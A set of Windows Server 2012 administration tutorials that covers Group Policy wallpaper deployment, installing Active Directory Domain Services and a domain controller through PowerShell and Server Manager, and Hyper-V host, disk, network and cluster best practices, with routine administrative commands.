Group Policy Settings are the actual configuration settings that can be applied to a domain computer or user. Most of the settings have three states, Enabled, Disabled and Not Configured. Group Policy Management Editor provides access to hundreds of computer and user settings that can be applied to make many system changes to the desktop and server environment.

Group Policy Settings

Group Policy Settings are divided into Computer Settings and User Settings. Computer Settings are applied to the computer when the system starts and modify the HKEY_LOCAL_MACHINE hive of the registry. User Settings are applied when users log in to the computer and modify the HKEY_CURRENT_USER hive.

Figure 2. Group Policy Settings

Computer Settings and User Settings both have policies and preferences.

These policies are:

Software Settings: Software can be deployed to users or computers by the administrator. Software deployed to users will be available only to those specific users, whereas software deployed to a computer will be available to any user that logs on to the specific computer where the GPO is applied.

Windows Settings: Windows settings can be applied to a user or a computer in order to modify the windows environment. Examples are: password policies, firewall policy, account lockout policy, scripts and so on.  

Administrative Templates: Contains a number of user and computer settings that can be applied to control the windows environment of users or computers. For example, specifying the desktop wallpaper, disabling access to non-essential areas of the computers (e.g Network desktop icon, control panel etc), folder redirection and many more.

Preferences are a group policy extension that does the work which would otherwise require scripts. Preferences are used for both users and computers. You can use preferences to map network drives for users, map printers, configure internet options and more.

Next, let’s take a look at how we can create and apply a Group Policy.


Creating & Applying Group Policy Objects

By default, GPOs can be created and applied by the Domain Admins, Enterprise Admins and Group Policy Creator Owners user groups. After creating a GPO, you can apply or link it to sites, domains or Organizational Units (OUs); however, you cannot link a GPO directly to users, groups, or computers. GPOs are processed in the following top-to-bottom order:

  1. Local Group Policy: Every Windows operating system has a local group policy by default, so the computer's local group policy is applied first.
  2. Site GPO: GPOs linked to the Site are processed next. By default, there is no site-level group policy configured.
  3. Domain GPO: Next, GPOs configured at the domain level are processed. By default, a GPO named Default Domain Policy is applied at the domain level and applies to all objects in the domain. If there is a policy conflict between domain- and site-level GPOs, the domain-level GPO takes precedence.
  4. Organizational Unit GPO: Finally, GPOs linked to OUs are applied. If there is any conflict with previously applied GPOs, the OU-linked GPO takes precedence over the Domain, Site and Local Group Policy.
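
The resulting link order for any container can also be inspected from PowerShell on the domain controller. The following is a minimal sketch using the GroupPolicy module; the OU distinguished name is an assumption based on our lab domain (firewall.local) and the FW Users OU used later in this article:

PS C:\> Import-Module GroupPolicy
# List the GPOs linked to (and inherited by) the FW Users OU, in precedence order
PS C:\> Get-GPInheritance -Target "OU=FW Users,DC=firewall,DC=local"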

Let’s now take a look at a scenario to apply a group policy to domain joined computers to change the desktop background. We have a domain controller named FW-DC01 and two clients FW-CL1 and FW-CL2 as shown in the diagram below. The goal here is to set the desktop wallpaper for these two clients from a group policy:

Figure 3. GPO Scenario

In our earlier articles we showed how Windows 8 / Windows 8.1 clients join an Active Directory domain; FW-CL1 and FW-CL2 are workstations that have already joined our Active Directory domain. We have two users, MJackson and PWall, in the FW Users OU.

Open the Group Policy Management Console (GPMC) by going to Server Manager > Tools and selecting Group Policy Management as shown below:

Figure 4. Open GPMC

As the GPMC opens up, you will see the tree hierarchy of the domain. Now expand the domain, firewall.local in our case, and you will see the FW Users OU which is where our users reside. From here, right-click this OU and select the first option Create a GPO in this domain and Link it here:

Figure 5. Select FW Users and Create a GPO

Now type the Name for this GPO object and click the OK button. We selected WallPaper GPO:

Figure 6. Creating our Wallpaper Group Policy Object
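
For reference, the same GPO can be created and linked from PowerShell on the domain controller. This is a minimal sketch using the GroupPolicy module; the OU distinguished name is an assumption derived from our firewall.local domain and the FW Users OU:

PS C:\> Import-Module GroupPolicy
# Create the GPO and link it to the FW Users OU in one step
PS C:\> New-GPO -Name "WallPaper GPO" | New-GPLink -Target "OU=FW Users,DC=firewall,DC=local"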

Next, right-click the GPO object and click edit:

Figure 7. Editing a Group Policy Object

At this point we get to see and configure the policy that deals with the Desktop Wallpaper; however, notice the number of different policies that allow us to configure and tweak various aspects of our domain users.

To find the Desktop Wallpaper setting, expand User Configuration > Policies > Administrative Templates > Desktop > Desktop. At this point we should be able to see the setting in the right window. Right-click the Desktop Wallpaper setting and select Edit:

Figure 8. Selecting and editing Desktop Wallpaper policy

The settings of the Desktop Wallpaper policy will now open. First we need to activate the policy by selecting the Enabled option on the left. Next, type the UNC path of the shared wallpaper. Remember that we must share the folder that contains the wallpaper \\FW-DC1\WallPaper\ and configure the share permissions so that users can access it. Notice that we can even select to center our wallpaper (Wallpaper Style). When ready, click Apply and then OK:

Figure 9. Configure Desktop Wallpaper
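
The same setting can also be pushed from PowerShell with Set-GPRegistryValue, which writes the registry values this administrative template typically controls (Wallpaper and WallpaperStyle under the user Policies\System key). This is a hedged sketch only: the wallpaper file name is an example, and values written this way may appear in the editor as raw registry settings rather than under the Desktop template:

PS C:\> Import-Module GroupPolicy
# Point the user policy at the shared wallpaper and center it (WallpaperStyle 0 = Center)
PS C:\> Set-GPRegistryValue -Name "WallPaper GPO" -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "Wallpaper" -Type String -Value "\\FW-DC1\WallPaper\background.jpg"
PS C:\> Set-GPRegistryValue -Name "WallPaper GPO" -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" -ValueName "WallpaperStyle" -Type String -Value "0"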

Now that we've configured our GPO, we need to apply it. To do so, we can simply log off and log back in to the client computer, or run the following command at the client's command prompt to apply the settings immediately:

C:\> gpupdate /force
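
On Windows Server 2012 the refresh can also be triggered remotely from the domain controller with the GroupPolicy module's Invoke-GPUpdate cmdlet. The sketch below assumes the clients are online and that the firewall/scheduled-task requirements for remote policy refresh are met:

PS C:\> Import-Module GroupPolicy
# Schedule an immediate policy refresh on both lab clients
PS C:\> Invoke-GPUpdate -Computer "FW-CL1" -Force
PS C:\> Invoke-GPUpdate -Computer "FW-CL2" -Force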

Once our domain user logs in to their computer (FW-CL1), the new wallpaper policy will be applied and loaded on to the computer’s desktop.

Figure 10. User Login

As we can see below, our user's desktop now has the background image configured in the group policy we created:

Figure 11. Computer Desktop Wallpaper Changed

This example shows how one small configuration setting can be applied to all computers inside an organization. The power and flexibility of Group Policy Objects is remarkable and, as we've shown, they can be configured and applied with just a few clicks on the domain controller!


This article explained what Group Policy Objects are and showed how to configure Windows 2012 Active Directory Group Policies to control our Active Directory users and computers. We also highly recommend our article on Group Policy Enforcement and Inheritance throughout the Active Directory structure. More articles on Windows 2012 & Hyper-V can be found in our Windows 2012 Server section.

 


Installing Active Directory Services & Domain Controller via Windows PowerShell. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.

Our previous article covered the installation of Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) interface.


What Is Active Directory?

Active Directory is the heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is the central repository of Active Directory objects such as user accounts, computer accounts, groups, group policies and so on. Active Directory also authenticates user accounts and computer accounts when they log in to the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory database (NTDS.DIT) and the SYSVOL (System Volume) folder.
  2. Data Store: The actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: An Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: A Forest is a collection of Domains that share a common Active Directory database. The first Domain in a Forest is called the Forest Root Domain.
  5. Tree: A Tree is a collection of domain names that share a common root domain.
  6. Schema: The Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): OUs are simply containers or folders in Active Directory that store other Active Directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: Sites are Active Directory objects that represent physical locations. Sites are configured for proper replication of the Active Directory database between locations.
  9. Partition: The Active Directory database file is made up of multiple partitions, also called naming contexts. These include the application, schema, configuration, domain and global catalog partitions.

Checking Active Directory Domain Services Role Availability 

Another method of installing an Active Directory Services Role &  Domain Controller is with the use of Windows PowerShell. PowerShell is a powerful scripting tool and an alternative to the Windows GUI wizard we covered in our previous article. Open PowerShell as an Administrator and type the following cmdlet to check for the Active Directory Domain Services Role availability:

PS C:\Users\Administrator> Get-WindowsFeature AD-Domain-Services

The system should return the Install State as Available, indicating the role is available for immediate installation. We can now safely proceed to the next step.

Install Active Directory Services Role & Domain Controller Using Windows PowerShell

To initiate the installation of Active Directory Services Role on Windows Server 2012 R2, issue the following cmdlet:

PS C:\Users\Administrator> Install-WindowsFeature -Name AD-Domain-Services
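
Tip: if you also want the AD DS management tools (Active Directory Users and Computers, the Active Directory PowerShell module, and so on) installed in the same run, the -IncludeManagementTools switch is commonly added:

PS C:\Users\Administrator> Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools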

The system will immediately begin the installation of the Active Directory Domain Services role and provide an update of the installation's progress:


Figure 1. Installing Active Directory Domain Services with PowerShell

Once the installation is complete, the prompt is updated with a success message (Exit Code) as shown below:


Figure 2. Finished Installing ADDS with PowerShell

The next step is to promote the server to an Active Directory domain controller. Before doing so, you should run the prerequisite checks for a new forest installation by typing the following cmdlet in PowerShell:

PS C:\Users\Administrator> Test-ADDSForestInstallation

The following figure shows the command execution and system output:


Figure 3. Prerequisite Installation

Now it's time to promote the server to a domain controller. For this step, we need to save all parameters in a PowerShell script (using notepad), which will then be used during the domain controller installation.


Below are the options we used - these are identical to what we selected in our GUI Wizard installation covered in our Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) article:

#
# Windows PowerShell script for AD DS Deployment
#
Import-Module ADDSDeployment
Install-ADDSForest `
-CreateDnsDelegation:$false `
-DatabasePath "C:\Windows\NTDS" `
-DomainMode "Win2012R2" `
-DomainName "firewall.local" `
-DomainNetbiosName "FIREWALL" `
-ForestMode "Win2012R2" `
-InstallDns:$true `
-LogPath "C:\Windows\NTDS" `
-NoRebootOnCompletion:$false `
-SysvolPath "C:\Windows\SYSVOL" `
-Force:$true

Save the script in an easily accessible location, e.g. the Desktop, with the name InstallDC.ps1.

Before running the script, we need to change the PowerShell execution policy to RemoteSigned. This is accomplished with the following cmdlet:

PS C:\Users\Administrator\Desktop> Set-ExecutionPolicy RemoteSigned

The following figure shows the command execution and system output:


Figure 4. Changing the Execution Policy of PowerShell

Now we can execute our script from within PowerShell by changing the PowerShell directory to the location where the script resides and typing the following cmdlet:

PS C:\Users\Administrator\Desktop> .\InstallDC.ps1

Once executed, the server is promoted to Domain Controller and installation updates are provided at the PowerShell prompt:


Figure 5. Promoting Server to Domain Controller

After the installation is complete, the server reboots with Active Directory Domain Services installed and is now a Domain Controller.
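
Once the server is back up, a quick sanity check from PowerShell can confirm the promotion succeeded. The following is a minimal sketch, assuming the Active Directory module is present on the new domain controller:

PS C:\> Import-Module ActiveDirectory
# Confirm the new forest/domain and list the domain controller(s)
PS C:\> Get-ADDomain | Select-Object DNSRoot, DomainMode, PDCEmulator
PS C:\> Get-ADDomainController -Filter * | Select-Object Name, Site, IPv4Address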

This completes the installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.



Installing Windows Server 2012 Active Directory via Server Manager. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of a Windows 2012 Domain Controller using Windows Server Manager (GUI).

Readers interested in performing the installation via Windows PowerShell can read this article.


What is Active Directory?

Active Directory is the heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is a central repository of Active Directory objects such as user accounts, computer accounts, groups, group policies and so on. Active Directory also authenticates user accounts and computer accounts when they log in to the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory database (NTDS.DIT) and the SYSVOL (System Volume) folder.
  2. Data Store: The actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: An Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: A Forest is a collection of Domains that share a common Active Directory database. The first Domain in a Forest is called the Forest Root Domain.
  5. Tree: A Tree is a collection of domain names that share a common root domain.
  6. Schema: The Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): OUs are simply containers or folders in Active Directory that store other Active Directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: Sites are Active Directory objects that represent physical locations. Sites are configured for proper replication of the Active Directory database between locations.
  9. Partition: The Active Directory database file is made up of multiple partitions, also called naming contexts. These include the application, schema, configuration, domain and global catalog partitions.

Installing Active Directory Domain Controller In Server 2012

In Windows Server 2012, the Active Directory Domain Controller role can be installed using the Server Manager or alternatively, using Windows PowerShell. The figure below represents our lab setup which includes a Windows Server 2012 (FW-DC01) waiting to have the Active Directory Domain Services server role installed on it:


Notice that there are two Windows 8 clients waiting to join the Active Directory domain once installed.

A checklist before installing a Domain Controller in your network is always recommended. The list should include the following information:

  • Server Host Name – A valid hostname or computer name must be assigned to the domain controller. We've selected FW-DC01 as the server's host name.
  • IP Address – You should configure a static IP address, one which will not be changed later on. In our example, we've used 192.168.1.1/24, which is a Class C IP address.
  • Domain Name – Perhaps one of the most important items on our checklist. We've used firewall.local for our setup. While many will want to use an existing public domain, e.g. their company's domain, it is highly recommended this practice is avoided, as it can create a number of problems with DNS resolution when internal hosts or servers try to resolve hosts that exist in both the private and public namespaces.

Microsoft doesn't recommend the usage of a public domain name in an internal domain controller, which is why we selected firewall.local instead of firewall.cx.
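
For those preparing the server from the command line, the host name, static IP address and DNS settings from the checklist can also be configured with PowerShell. The sketch below uses our checklist values, but the interface alias "Ethernet" is an assumption and should be replaced with the name of your own network adapter:

# Set the static IP and point DNS at the server itself (it will host DNS shortly)
PS C:\> New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 192.168.1.1 -PrefixLength 24
PS C:\> Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 192.168.1.1
# Rename the server and reboot for the new name to take effect
PS C:\> Rename-Computer -NewName "FW-DC01" -Restart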

Installing Active Directory Domain Controller Using Server Manager

Initiating the installation of Active Directory is a simple process; however it does require Administrator privileges. Open Server Manager, go to Manage and select Add Roles and Features:

Figure 2. Add Roles and Features

Click Next on the Before you begin page.

On the next screen, choose Role-based or feature-based Installation and click Next:


 Figure 3. Choose Role Based Installation

Select the destination server by choosing the Select a server from the server pool option, highlight the server and click Next. In cases like our lab, where only one server is available, that server is the one to select:


 Figure 4. Select Destination Server

In the Select server roles page, select the Active Directory Domain Services role and click Next:


Figure 5. Select AD DS role

The next page is the Features page, which we can safely skip by clicking Next.

The Active Directory Domain Services page contains limited information on requirements and best practices for Active Directory Domain Services:


Figure 6. AD DS Page

Once you've read the information provided, click Next to proceed to the final confirmation page.


On the confirmation page, select Restart the destination server automatically if required and click on the Install button. By clicking Install, you confirm you are ready to begin the AD DS role installation:


Figure 7. AD DS Confirmation

Note: You cannot cancel a role installation once it begins

The Add Roles and Feature Wizard will continuously provide updates during the Active Directory Domain Services role installation, as shown below:


Figure 8. Installation Progress

Once the installation has completed successfully, we should expect to see the Installation succeeded message under the installation progress bar:


Figure 9. Successful Installation & Promote Server to DC

Promoting Server To Domain Controller

At this point we can choose to Promote this server to a domain controller by clicking on the appropriate link as highlighted above (Blue arrow).

After selecting the Promote this server to a domain controller option, the Deployment Configuration page will appear. Assuming this is the first domain controller in the network, as in our case, select the Add a new forest option to set up a new forest, and then type the fully qualified domain name under the Root domain name section. We've selected to use firewall.local:


Figure 10. Configure Domain Name

Administrators who already have active directory installed would most likely select the Add a domain controller to an existing domain option. Having at least two Domain Controllers is highly advisable for redundancy purposes. When done click the Next button.

Now select Windows Server 2012 R2 for the Forest functional level and Domain functional level. By setting the domain and forest functional levels to the highest value your environment can support, you'll be able to use as many Active Directory Domain Services features as possible. If, for example, you do not plan to ever add domain controllers running Windows 2003, but might add a Windows 2008 server as a domain controller, you would select Windows Server 2008 for the Domain functional level. Next, tick the Domain Name System (DNS) server option as shown in the figure below:


Figure 11. DC Capabilities

The DNS Server role can also be installed later on. If for any reason you need to install the DNS Server role at a later time, please read our How to Install and Configure Windows 2012 DNS Server Role article.

Since this is the first domain controller in the forest, Global Catalog (GC) will be selected by default. Now set the Directory Services Restore Mode (DSRM) password. DSRM is used to restore active directory in case of failure. Once done, click Next.

The next window is the DNS Options page. Here we might encounter the following warning, which can be safely ignored because there is no existing authoritative parent DNS zone to delegate from (we are about to install the DNS server ourselves):

A delegation for this DNS server cannot be created because the authoritative parent zone cannot be found...

Ignore the warning and click Next to continue.

In the next window, Additional Options, leave the default NetBIOS domain name and click Next. The Windows AD DS wizard will automatically remove the .local from the domain name to ensure compatibility with NetBIOS name resolution:


Figure 12. Additional Options

The next step involves the Paths selection which allows the selection of where to install the Database, Log Files and SYSVOL folders. You can either browse to a different location or leave the default settings (as we did). When complete, click Next:


Figure 13. Paths

Note: When the installation is complete, the Database folder will contain a file named NTDS.DIT. This important file is the database file of your Active Directory.

Finally, the next screen allows us to perform a quick review of all selected options before initiating the installation. Once reviewed, click Next:


Figure 14. Review Options

The server will now perform some prerequisite checks. If successful, a green check mark is shown at the top. Some warnings may appear; however, if these are non-critical, we can still proceed with the installation. Click the Install button to promote this server to a domain controller:


Figure 15. Prerequisites Check

The installation begins and the server's installation progress is continuously updated:


Figure 16. Installation Begins

When the installation of Active Directory is complete, the server will restart.

Assuming we've restarted, we can now open Active Directory Users and Computers and begin creating user accounts and computer accounts, applying group policies, and so on.


Figure 17. Active Directory Users and Computers

As expected, under the Domain Controllers section, we found our single domain controller. If we were to add our new domain controller to an existing active directory, then we would expect to find all domain controllers listed here.
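
Administrators who prefer the command line can create the same kind of objects with the Active Directory PowerShell module. The sketch below mirrors the OU and user names used in our Group Policy article; the password prompt and the exact attribute choices are assumptions rather than a prescribed procedure:

PS C:\> Import-Module ActiveDirectory
# Create the FW Users OU and a user account inside it
PS C:\> New-ADOrganizationalUnit -Name "FW Users" -Path "DC=firewall,DC=local"
PS C:\> New-ADUser -Name "MJackson" -SamAccountName "MJackson" -Path "OU=FW Users,DC=firewall,DC=local" -AccountPassword (Read-Host -AsSecureString "Enter password") -Enabled $true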



Hyper-V Best Practices - Replica, Cluster, Backup Advice

Hyper-V has proven to be a very cost-effective solution for server consolidation. Evidence of this is the fact that companies are beginning to move from VMware to the Hyper-V virtualization platform. This article covers Windows 2012 Hyper-V best practices, and aims to help you run your Hyper-V virtualization environment as optimally as possible.

Keeping your Hyper-V virtualization infrastructure running as smoothly as possible can be a daunting task, which is why we recommend engineers follow the best Hyper-V practices.

Different organizations have different setups and requirements: some of you might be moving from VMware to Hyper-V virtualization, while others might be upgrading from an older Hyper-V virtualization server to a newer one. Each scenario should follow baseline best practices in order to run the virtualization infrastructure successfully, without problems.


Hyper-V Best Practice List

Best practices for Hyper-V vary considerably depending on whether you're using clustered servers. As a general rule-of-thumb the best thing you can do is try to configure your host server and your Virtual Machines in a way that avoids resource contention to the greatest extent possible.

Organizations who are considering migrating their infrastructure to Hyper-V, or are currently running on the Hyper-V virtualization platform, need to take note of the below important points that must not be overlooked:

Processor

Minimum: A 1.4 GHz 64-bit processor with hardware-assisted virtualization. This feature is available in processors that include a virtualization option—specifically, processors with Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V) technology.
Hardware-enforced Data Execution Prevention (DEP) must also be available and enabled. For Intel CPUs this means enabling the Intel XD ("execute disable") bit, while for AMD CPUs it means enabling the AMD NX ("no execute") bit.
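
On Windows 8 / Windows Server 2012 and later, a quick way to check whether the CPU and BIOS settings above are in place is the systeminfo utility, which reports a "Hyper-V Requirements" section (if Hyper-V is already installed it simply reports that a hypervisor has been detected). A minimal sketch:

# Show the Hyper-V Requirements section (the three lines following the matching line)
PS C:\> systeminfo | Select-String -Pattern "Hyper-V" -Context 0,3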

Memory

Minimum: 512 MB. This is the bare minimum; however, a logical approach would be at least 4 GB of RAM per virtual server. If one physical server is to host 4 virtual machines, then we would recommend at least 16 GB of physical RAM, if not more. SQL servers and other RAM-intensive services would certainly lift the memory requirements a lot higher. You can never have enough memory.

Network Adapters

At least one network adapter is required, but two or more are always recommended. Hyper-V allows the creation of three different virtual switches: Internal Virtual Switches, Private Virtual Switches and External Virtual Switches.

Internal virtual switches are used to allow the virtual machine to connect with its host machine (the physical machine that runs Hyper-V). Private virtual switches are used when we only want to connect virtual machines running on the same host to each other. External virtual switches are used to allow the virtual machine to connect to our LAN, and this is where physical network adapters come in handy.
Host machines with only one network adapter will be forced to share that adapter with all of their virtual machines. This is why it's always best practice to have at least two network adapters available.

Additional Considerations

The settings for hardware-assisted virtualization and hardware-enforced DEP are usually available within the system's BIOS; however, the names of the settings may differ from the names identified previously.
For more information about whether a specific processor model supports Hyper-V (virtualization), check the manufacturer's website.

As noted before, it is important to remember after modifying the settings for hardware-assisted virtualization or hardware-enforced DEP, you may need to turn off the power to the server and then turn it back on to ensure the new CPU settings are loaded.

Microsoft Assessment & Planning Toolkit

Microsoft Assessment and Planning Toolkit (MAP) can be used to study existing infrastructure and determine the Hyper-V requirement. For organizations who are interested in server consolidation and virtualization through technologies such as Hyper-V, MAP helps gather performance metrics and generate server consolidation recommendations that identify the candidates for server virtualization and will even suggest how the physical servers might be placed in a virtualized environment.

The diagram below shows the MAP phases involved to successfully create the necessary reports:


Figure 1. MAP Phases

Below is an overview of the Microsoft Assessment and Planning Toolkit application:


Figure 2. MAP Overview

The following points are the best practices which should be considered before deploying your Windows Server 2012 Hyper-V infrastructure:

Hyper-V Hosts (Physical Servers)

  • Ensure hosts are up-to-date with recommended Microsoft updates
  • Ensure hosts have the latest BIOS version, as well as the latest firmware for other hardware components (such as Fibre Channel HBAs, NICs, RAID BIOS, etc.)
  • Hosts must be part of a domain before you can create a Hyper-V High-Availability Cluster.
  • RDP Printer Mapping should be disabled on hosts, to remove any chance of a printer driver causing instability issues on the host machine. To do this, follow the below steps: Computer Configuration –> Policies –> Administrative Templates –> Windows Components –> Remote Desktop Services –> Remote Desktop Session Host –> Printer Redirection –> Do not allow client printer redirection –> Set to "Enabled”
  • Do not install any other Roles on a host besides the Hyper-V role and the Remote Desktop Services roles. Optionally, if the host will become part of a cluster, you can install Failover Cluster Manager. In the event the host connects to an iSCSI SAN and/or Fiber Channel, you can also install Multipath I/O.
  • Anti-virus software should exclude Hyper-V specific files, as described in the Antivirus Exclusions for Hyper-V Hosts article available from Microsoft.
  • The default path for Virtual Hard Disks (VHD/VHDX) should be set to a non-system drive, since keeping it on the system drive can cause disk latency and creates the potential for the host to run out of disk space (a PowerShell sketch for this follows the list).
  • If you are using iSCSI: In Windows Firewall with Advanced Security, enable iSCSI Service (TCP-In) for Inbound and iSCSI Service (TCP-Out) for outbound in Firewall settings on each host. This will ensure iSCSI traffic is allowed to pass from host to the SAN device and back. Not enabling these rules will prevent iSCSI communication. To set the iSCSI firewall rules via netsh, you can use the following command:

PS C:\Windows\system32> Netsh advfirewall firewall set rule group="iSCSI Service" new enable=yes

  • Periodically run performance counters against the host to ensure optimal performance. We recommend using the Hyper-V performance counters that can be extracted from the (free) CodePlex PAL application.
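
As referenced in the default-path bullet above, the default virtual machine and virtual hard disk locations can be moved off the system drive with a single cmdlet. The paths below are examples only:

# Store VM configuration files and VHDX files on a dedicated data drive
PS C:\> Set-VMHost -VirtualMachinePath "D:\Hyper-V" -VirtualHardDiskPath "D:\Hyper-V\Virtual Hard Disks"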

Hyper-V Virtual Machines

  • Ensure you are running only supported guests in your environment.
  • Ensure you are using sophisticated backup software such as Altaro's Hyper-V Backup, which also includes free lifetime backup for a specific number of VMs.
  • If you are converting VMware virtual machines to Hyper-V, consider using MVMC (a free, stand-alone tool offered by Microsoft) or VMM.
  • Disk2vhd is a tool which can be used to convert a physical machine to a Hyper-V virtual machine (P2V). The VHD file created can then be imported into Hyper-V.

Hyper-V Physical NICs

  • Ensure Network Adapters have the latest firmware and drivers, which often address known issues with hardware and performance.
  • TCP Chimney Offload is not supported with Server 2012 software-based NIC teaming, because TCP Chimney has the entire networking stack offloaded to the NIC. If however software-based NIC teaming is not used, you can leave TCP Chimney Offload enabled. To disable TCP Chimney Offload, from an elevated command-prompt, type the following command:

PS C:\Windows\system32> netsh int tcp set global chimney=disabled

  • Jumbo frames should be turned on and set for 9000 or 9014 (depending on your hardware) for CSV, iSCSI and Live Migration networks. To verify Jumbo frames have been successfully configured, run the following command from all your Hyper-V host(s) to your iSCSI SAN:

PS C:\Windows\system32> ping 10.50.2.35 -f -l 8000

This command will ping the SAN (e.g. 10.50.2.35) with an 8K packet from the host. If replies are received, Jumbo frames are properly configured. Note that if a network switch exists between the host and the iSCSI SAN, Jumbo frames must be enabled on it as well.


 Figure 3. Jumbo Frame Ping Test
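
The adapter-side setting can also be checked from PowerShell. The sketch below is an assumption-heavy example: the adapter name "Ethernet" and the exact display name of the jumbo frame property vary by vendor and driver:

# Look for the vendor's jumbo frame / jumbo packet advanced property on the adapter
PS C:\> Get-NetAdapterAdvancedProperty -Name "Ethernet" | Where-Object { $_.DisplayName -like "*Jumbo*" }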

  • Management NIC should be at the top (1st) in NIC Binding Order. To set the NIC binding order: Control Panel --> Network and Internet --> Network Connections. Next, select the advanced menu item, and select Advanced Settings. In the Advanced Settings window, select your management network under Connections and use the arrows on the right to move it to the top of the list.
  • If using NIC teaming inside a guest VM, follow this order: open the settings of the virtual machine; under Network Adapter, select Advanced Features; in the right pane, under NIC Teaming, tick "Enable this network adapter to be part of a team in the guest operating system". Once inside the VM, open Server Manager and, in the All Servers view, enable NIC Teaming for the server:


Figure 4. Enable NIC Teaming

Hyper-V Disks

  • New disks should use the VHDX format. Disks created in earlier Hyper-V iterations should be converted to VHDX, unless there is a need to move the VHD back to a 2008 Hyper-V host.
  • Disk used for CSV must be partitioned with NTFS. You cannot use a disk for a CSV that is formatted with FAT, FAT32, or Resilient File System (ReFS).
  • Disks should be fixed-size in a production environment, to increase disk throughput. Differencing and dynamic disks are not recommended for production, due to their increased disk read/write latency.
  • Shared Virtual Hard Disk: Do not use a shared VHDx file for the operating system disk. Servers should have a unique VHDx (for the OS) that only they can access. Shared Virtual Hard Disks are better used as data disks and for the disk witness.
  • Use caution when using snapshots. If not properly managed, snapshots can cause disk space issues, as well as additional physical I/O overhead.
  • The page file on the Hyper-V host should be managed by the OS and not configured manually.
  • It is not supported to create a storage pool using Fiber Channel or iSCSI LUNs.

Hyper-V Memory

  • Use Dynamic Memory on all VMs (unless not supported), as shown in the sketch after this list.
  • Guest OS should be configured with (minimum) recommended memory
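
As noted in the Dynamic Memory bullet above, these values can be set per VM from PowerShell. The VM name and memory sizes below are examples only, and the VM should be powered off when changing them:

# Enable Dynamic Memory with example minimum/startup/maximum values
PS C:\> Set-VMMemory -VMName "VM01" -DynamicMemoryEnabled $true -MinimumBytes 512MB -StartupBytes 1GB -MaximumBytes 4GB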

Hyper-V Clusters

  • Set the preferred network for CSV communication, to ensure the correct network is used for this traffic. The network with the lowest metric in the output of the PowerShell commands below will be used for CSV traffic. First, open a PowerShell command prompt (using "Run as administrator"). Secondly, you'll need to import the FailoverClusters module by typing the following at the PowerShell command prompt:

PS C:\Windows\system32> Import-Module FailoverClusters

Next, we’ll request a listing of networks used by the host, as well as the metric assigned. This can be done by typing the following:

PS C:\Windows\system32> Get-ClusterNetwork | ft Name, Metric, AutoMetric, Role

In order to change which network interface is used for CSV traffic, use the following PowerShell command:

PS C:\Windows\system32> (Get-ClusterNetwork "CSV Network").Metric=900

This will set the metric of the network named "CSV Network" to 900.


Figure 5. Get Cluster Network

  • Set the preferred network(s) for Live Migration, to ensure the correct network(s) are used for this traffic, following these steps: open Failover Cluster Manager and expand the cluster. Next, right-click on Networks and select Live Migration Settings. Use the Up/Down buttons to list the networks in order from most preferred (at the top) to least preferred (at the bottom), and uncheck any networks you do not want used for Live Migration traffic. Select Apply and then press OK. Once you have made this change, it will be used for all VMs in the cluster.
  • The Host Shutdown Time (ShutdownTimeoutInMinutes registry entry) can be increased from the default time. This setting is usually increased when additional time is needed by VMs in order to ensure they have had enough time to shut down before the host reboots.

Registry Key: HKLM\Cluster\ShutdownTimeoutInMinutes 

Enter the value in minutes, as a decimal.

Note: Changing this registry value requires a server reboot in order to take effect:


Figure 6. Registry Shutdown Option

  • Run the Cluster Validation periodically to remediate any issues

Hyper-V Replica

  • Run the Hyper-V Replica Capacity Planner. The Capacity Planner for Hyper-V Replica allows you to plan your Hyper-V Replica deployment based on the workload, storage, network and server characteristics.
  • Update inbound traffic rules on the firewall to allow TCP port 80 and/or port 443 traffic (in Windows Firewall, enable the "Hyper-V Replica HTTP Listener (TCP-In)" rule on each node of the cluster). Shell commands to achieve the above are:

PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTP" new enable=yes
PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTPS" new enable=yes

  • Virtual hard disks with paging files should be excluded from replication, unless the page file is on the OS disk.
  • Test failovers should be performed monthly, at a minimum, to verify that failover will succeed and that virtual machine workloads will operate as expected after failover

Hyper-V Cluster-Aware Updating

  • Place all Cluster-Aware Updating (CAU) Run Profiles on a single File Share accessible to all potential CAU Update Coordinators. Run Profiles are configuration settings that can be saved as an XML file called an Updating Run Profile and reused for later Updating Runs.

Hyper-V SMB 3.0 File Shares

  • An Active Directory infrastructure is required, so you can grant permissions to the computer account of the Hyper-V hosts.
  • Loopback configurations (where the computer that is running Hyper-V is used as the file server for virtual machine storage) are not supported. Similarly, running the file share in VMs hosted on nodes that will serve other VMs is not supported.

Hyper-V Integration Services

  • Ensure Integration Services (IS) have been installed on all VMs. Integration Services significantly improve interaction between the VM and the physical host.

Hyper-V Offloaded Data Transfer (ODX) Usage

